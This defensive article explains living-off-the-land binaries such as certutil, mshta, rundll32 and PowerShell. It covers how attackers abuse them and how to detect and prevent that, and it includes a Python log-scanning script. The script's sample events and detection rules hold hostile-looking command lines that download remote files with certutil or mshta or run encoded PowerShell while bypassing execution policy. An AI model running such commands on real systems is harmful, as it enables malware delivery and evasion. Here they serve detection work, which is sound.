LOLBins: Hidden weapons in your own operating system

“LOLBins” (Living off the Land Binaries) is a technique in which attackers abuse legitimate tools and processes of the operating system itself to carry out malicious activity without being detected. This approach, known as “Living off the Land”, lets attackers camouflage their actions among normal system operations, making them difficult to identify.

For organizations, understanding and recognizing the use of LOLBins is essential to strengthen their defense strategies. By using native system tools, cybercriminals can avoid detection by conventional security solutions, posing a significant threat to the integrity and security of corporate information.

The purpose of this article is to go deeper into the concept of LOLBins, to analyze how they work and to highlight the importance of being alert to this constantly evolving technique.

Definition
LOLBins, an acronym for “Living Off the Land Binaries,” are legitimate, pre-installed executables in operating systems that cybercriminals exploit to carry out malicious activities without raising suspicion. By using these embedded tools, attackers can camouflage their actions as routine system operations, making them difficult to detect.

Difference between LOLBins, LOLScripts and LOLLibs
In addition to LOLBins, there are other related terms:

  • LOLScripts: Legitimate system scripts that can be exploited for malicious purposes.
  • LOLLibs: System libraries that, similarly, can be misused by attackers.

Although they all share the characteristic of being legitimate system components used for malicious purposes, they differ in nature: executables (LOLBins), scripts (LOLScripts) and libraries (LOLLibs).

Origin of the concept and historical cases
The concept of “Living Off the Land” was introduced by researchers Christopher Campbell and Matt Graeber in 2013 to describe how attackers employ trusted, pre-installed tools on systems for their malicious purposes.

One notable example is the TA505 group, which in 2018 conducted phishing campaigns targeting large financial organizations. They used LOLBins to covertly distribute malware, demonstrating the effectiveness of this technique in evading traditional security defenses.

Most used LOLBins
Cybercriminals take advantage of legitimate tools present in operating systems to carry out malicious activities without being easily detected. Below are some of the most commonly used LOLBins on different platforms:

Windows:

  • powershell.exe: PowerShell is a powerful command-line and scripting tool in Windows. Attackers use it to execute malicious scripts, download payloads from the Internet and perform lateral movement within the network, all without leaving obvious traces on the file system.
  • rundll32.exe: This utility loads and executes dynamic link libraries (DLLs). It is used by cybercriminals to execute malicious code contained in DLLs, allowing malware to run without creating visible executable files.
  • bitsadmin.exe: Originally designed to manage background transfers, such as updates, this program can be manipulated to download or upload malicious files from or to attacker-controlled servers, facilitating data exfiltration or the introduction of malware.
  • mshta.exe: Executes HTML applications. Attackers use it to execute malicious scripts embedded in HTML files or directly from the Internet, allowing code execution without alerting security solutions.
  • certutil.exe: Command-line tool for certificate management in Windows. It is abused by cybercriminals to download and decode malicious files, taking advantage of its ability to handle data in encrypted formats.

Linux:

  • bash: The default command interpreter in many Linux distributions. Attackers can write and execute malicious scripts directly in bash to automate tasks such as harvesting data or creating backdoors.
  • wget and curl: Utilities for transferring data to or from servers. Cybercriminals use them to download malicious scripts or binaries from remote locations, facilitating the introduction of malware into the system.
  • ssh: Protocol for securely accessing remote systems. If credentials are compromised, attackers can use ssh to move laterally between systems within a network, maintaining undetected access.

macOS:

  • osascript: Enables the execution of AppleScript scripts and other languages. Attackers use it to execute malicious scripts that can interact with applications and the operating system, facilitating actions such as capturing sensitive information or executing arbitrary commands.
  • bash: As in Linux, bash is present in macOS and can be used to execute malicious scripts, providing attackers with a way to perform unauthorized actions on the system.

Detection and prevention methods

  • Implementation of EDR and XDR solutions: Endpoint Detection and Response (EDR) and Extended Detection and Response (XDR) solutions are essential for monitoring and analyzing suspicious activity on systems. These tools can identify anomalous behavior associated with the misuse of LOLBins. For example, they can detect the unusual execution of binaries such as rundll32.exe or regsvr32.exe which, although legitimate, can be exploited for malicious purposes.
  • Monitoring the use of system tools: It is crucial to continuously monitor the use of tools and binaries built into the operating system. Establishing baselines of normal behavior for these binaries helps to identify deviations that could indicate malicious activity. For example, if mshta.exe initiates unusual network connections or downloads scripts from unauthorized locations, this could be an indication of compromise.
  • Enforce the principle of least privilege: Limiting the privileges of employees and applications significantly reduces the opportunities for cybercriminals to exploit LOLBins. Ensure that users and processes only have the permissions necessary to perform their functions, minimizing the risk of unauthorized execution of system binaries.
  • Log review and monitoring for unusual behavior: Configuring detailed, centralized logs allows for effective review of system activities. Detecting unusual patterns, such as running binaries from non-standard locations or with atypical parameters, can signal misuse of LOLBins. For example, running certutil.exe to download files from the Internet is a known technique used by attackers.
  • Blocking unneeded tools in organizational environments: Identifying and disabling binaries and scripts that are not essential to the organization’s operations can prevent their malicious use. Implementing lists of allowed applications and restricting the execution of tools such as powershell.exe or wmic.exe to authorized users and processes strengthens the security posture.
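As an added example (not code from the original article), the following Python script applies the checks described above, binaries run from non-standard locations, atypical parameters and an unusual parent process, to a few constructed process-creation events; the field layout, rule set and sample lines are assumptions made for the illustration.

```python
# Added example (not from the original article): flag suspicious LOLBin use in
# process-creation logs. Field names, sample events and rules are assumptions.
import re
from typing import NamedTuple
Event = NamedTuple("Event", [("image", str), ("command", str), ("parent", str)])
# Constructed sample events in a Sysmon-like "Key=Value|Key=Value" layout.
# The EncodedCommand value is just "ABC" in UTF-16LE base64, not a payload.
SAMPLE_LOG = """\
Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil -urlcache -split -f http://files.example/a.txt a.txt|ParentImage=C:\\Windows\\System32\\cmd.exe
Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil -verify cert.cer|ParentImage=C:\\Windows\\explorer.exe
Image=C:\\Windows\\System32\\mshta.exe|CommandLine=mshta http://files.example/page.hta|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE
Image=C:\\Users\\Public\\rundll32.exe|CommandLine=rundll32 helper.dll,Start|ParentImage=C:\\Windows\\System32\\cmd.exe
Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell -ExecutionPolicy Bypass -EncodedCommand QQBCAEMA|ParentImage=C:\\Windows\\System32\\cmd.exe
Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell Get-Service|ParentImage=C:\\Windows\\explorer.exe
"""

WATCHED = {"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
           "bitsadmin.exe", "wmic.exe", "powershell.exe"}
STANDARD_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
RULES = [  # (finding, binary, pattern): atypical parameters for each binary
    ("certutil used to download or decode", "certutil.exe",
     re.compile(r"-urlcache|-decode|https?://", re.I)),
    ("mshta loading remote content", "mshta.exe", re.compile(r"https?://", re.I)),
    ("powershell encoded command or policy bypass", "powershell.exe",
     re.compile(r"-encodedcommand|-enc\b|bypass|downloadstring", re.I)),
]
def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def parse_event(line: str) -> Event:
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return Event(fields["Image"], fields["CommandLine"], fields["ParentImage"])

def analyze(ev: Event) -> list:
    """Findings for one event: empty list when nothing deviates from baseline."""
    name, findings = basename(ev.image), []
    if name not in WATCHED:
        return findings
    if not ev.image.lower().startswith(STANDARD_DIRS):  # non-standard location
        findings.append(f"{name} executed from non-standard path {ev.image}")
    if basename(ev.parent) in OFFICE_PARENTS:            # unusual parent process
        findings.append(f"{name} spawned by Office application")
    findings += [f for f, binary, pat in RULES if name == binary and pat.search(ev.command)]
    return findings

def scan_log(text: str) -> dict:
    # Map 1-based line numbers to findings for events that triggered a rule
    return {n: f for n, line in enumerate(text.splitlines(), 1)
            if line.strip() and (f := analyze(parse_event(line)))}
```

In a real deployment the same rules would be expressed in the EDR or SIEM query language and tuned against the organization's own baseline, since a plain `certutil -verify` or an interactive `powershell Get-Service` must not raise alerts.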

Good protection practices

  • Software updates and security patches: Keeping all systems and applications up to date is critical. Cybercriminals often exploit vulnerabilities in outdated software to execute LOLBins-based attacks. Establish a regular process for patch management and ensure that all updates are applied in a timely manner.
  • Employee education and training: Staff awareness is a crucial line of defense. Provide ongoing training for employees to recognize social engineering and phishing tactics, common methods for initiating attacks using LOLBins. Phishing simulations and cybersecurity awareness programs can be effective tools in this regard.
  • Implement the principle of least privilege: Limit user and process permissions to the minimum level necessary to perform their functions. By restricting privileges, you reduce the ability of attackers to exploit LOLBins and execute malicious commands with high levels of access.
  • System behavior monitoring and analysis: Use monitoring tools to detect anomalous system behavior that may indicate misuse of LOLBins. Continuous monitoring allows you to quickly identify and respond to suspicious activity before it causes significant damage.
  • Vulnerability management: Conduct regular vulnerability assessments to identify and remediate potential weaknesses in the IT infrastructure. Proactive vulnerability management helps prevent attackers from exploiting LOLBins through known system flaws.
  • Regular and secure backups: Establish procedures for regular backups of critical data and store them in secure locations isolated from the main network. This ensures the integrity and availability of information in case an attack compromises the main systems.

Conclusion
Cybercriminals have perfected the art of using legitimate operating system tools, known as LOLBins, to carry out malicious activities undetected. This strategy allows them to evade traditional security solutions and maintain prolonged access to compromised systems. For organizations, it is essential to recognize this threat and take proactive measures that include continuous monitoring of suspicious activity, implementation of least privilege policies and ongoing training of their employees in cybersecurity practices. By understanding and anticipating LOLBins-based tactics, organizations can strengthen their security posture and significantly reduce the risk of compromise.
